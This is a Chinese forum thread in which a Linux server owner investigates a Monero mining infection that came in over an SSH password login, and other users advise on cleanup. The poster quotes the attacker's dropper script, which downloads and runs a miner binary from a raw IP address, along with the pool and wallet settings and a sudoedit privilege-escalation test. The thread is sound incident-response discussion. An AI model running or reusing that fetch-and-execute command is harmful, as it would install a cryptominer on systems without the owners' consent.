【已查杀】LINUX中毒了怎么杀啊。

nisekoi

找到二进制文件和脚本了,不在root目录下。怪不得之前看到是./运行的却没看到。
原来是debianuser这个用户跑的。当时太着急kill了。都没仔细看

能不能向矿池举报封它号

1.             "url": "pool.supportxmr.com:3333",
   
2.             "user": "43hpviAqezAaSKg7g6nTruYUxvdoEbedQQxvAsKEoZbpfWMpwDAbb4tXdPmMYJ1wc4afLFPR5UPVW66Hg6uoXQDf9zyFEYc",
   

复制代码

s.sh脚本只有一条命令。wget http://45.130.138.17/cnrig; wget http://45.130.138.17/config.json; chmod 777 *; ./cnrig
应该不用担心进程复活了

------------------------

更新，疑似是前几天爆出的sudo提权漏洞。
检查了登录记录。是昨天下午通过debianuser 这个用户名进来的
Jan 31 16:14:18 NVMe sshd[10375]: Accepted password for debianuser from 205.185.125.189 port 47920 ssh2
Jan 31 16:24:17 NVMe sshd[17332]: Accepted password for debianuser from 205.185.125.189 port 42482 ssh2

于是我修改了debianuser用户的密码进去看了sudo的版本
debianuser@NVMe:~$ sudo --version
Sudo version 1.8.27

网上资料

1. 受影响版本
   
2. 
   
3. Sudo 1.8.2 - 1.8.31p2
   
4. 
   
5. Sudo 1.9.0 - 1.9.5p1

复制代码

但是我无法复现是为什么？
运行sudoedit -s /
debianuser is not in the sudoers file.  This incident will be reported.

------------------------------------------------------------

今天上号突然多了一个挖矿的进程
叫做cnrig。一直满载CPU几个小时。还好发现的早不然估计要被封机了。
现在临时把进程Kill了。要怎么知道他是咋入侵的呢。估计还有自启啥的

walx1589

等进程复活，然后找到对应目录删掉，启用证书登录，封掉账号密码登录

dabang007

你开放的服务比如http等有漏洞，利用漏洞就可以入侵；之前我机器跑个mqtt的服务，也被门罗币挖矿给入侵过...

nisekoi

walx1589 发表于 2021-2-1 09:41
等进程复活，然后找到对应目录删掉，启用证书登录，封掉账号密码登录

目录就在~./cnrig 我看了这个目录根本没有这个二进制文件
crontab里面检查了没有加料。不知道其他地方有没有什么自启的东西

siyun77

1.看看定时任务
2.看看定时任务里面得脚本内容
3.看看.ssh里面有没有奇怪的东西
4.看看root目录下有没有奇怪的文件
5.看看/tmp目录下有没有奇怪的文件
6.看看爱怪文件里面有没有守护进程id

挖矿脚本一般还是有节操的

nisekoi

dabang007 发表于 2021-2-1 09:41
你开放的服务比如http等有漏洞，利用漏洞就可以入侵；之前我机器跑个mqtt的服务，也被门罗币挖矿给入侵过.. ...

就跑了一个NGINX(1.19.6) 上面的程序都是些常见的如WP TP DZ之类的。。 mysql redis也没开公网访问。不知道是咋入侵的。

singhighssx

mark

jarvan

siyun77 发表于 2021-2-1 09:44
1.看看定时任务
2.看看定时任务里面得脚本内容
3.看看.ssh里面有没有奇怪的东西

没有节操的是什么样的？

siyun77

jarvan 发表于 2021-2-1 09:48
没有节操的是什么样的？

1.你不知道你已经中招
2.你知道你已经中招，并且造成严重损失